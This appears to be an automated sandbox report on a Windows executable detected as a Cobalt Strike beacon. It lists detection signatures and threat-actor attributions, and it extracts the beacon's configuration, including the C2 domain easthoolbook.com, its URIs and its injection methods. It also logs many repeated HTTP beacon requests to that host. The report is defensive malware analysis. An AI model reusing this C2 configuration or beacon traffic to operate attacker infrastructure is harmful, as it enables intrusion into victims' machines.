Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Analysis ID: 1428763
MD5: c720c50306558112b389ef44cff494f1
SHA1: 476f36c3f3a3aa0141b481fb683d3c0cbd767def
SHA256: 6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
Tags: exe

Detection

CobaltStrike
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Sets debug register (to hijack the execution of another thread)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

AV Detection

Source: 00000000.00000003.2073190217.000000000208E000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 62, "MaxGetSize": 2796804, "Jitter": 81, "C2Server": "easthoolbook.com,/sign.mpeg", "HttpPostUri": "/flexible", "Malleable_C2_Instructions": ["Remove 600 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpresult.exe", "Spawnto_x64": "%windir%\\sysnative\\gpresult.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 12345, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 22918, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe ReversingLabs: Detection: 25%
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_000000014003C388

Networking

Source: Malware configuration extractor URLs: easthoolbook.com
Source: Joe Sandbox View ASN Name: AVANTI-UK-ASGB AVANTI-UK-ASGB
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1 Host: easthoolbook.com Accept: application/xml Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ== User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36 Connection: Close Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: easthoolbook.com
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easthoolbook.com/8j
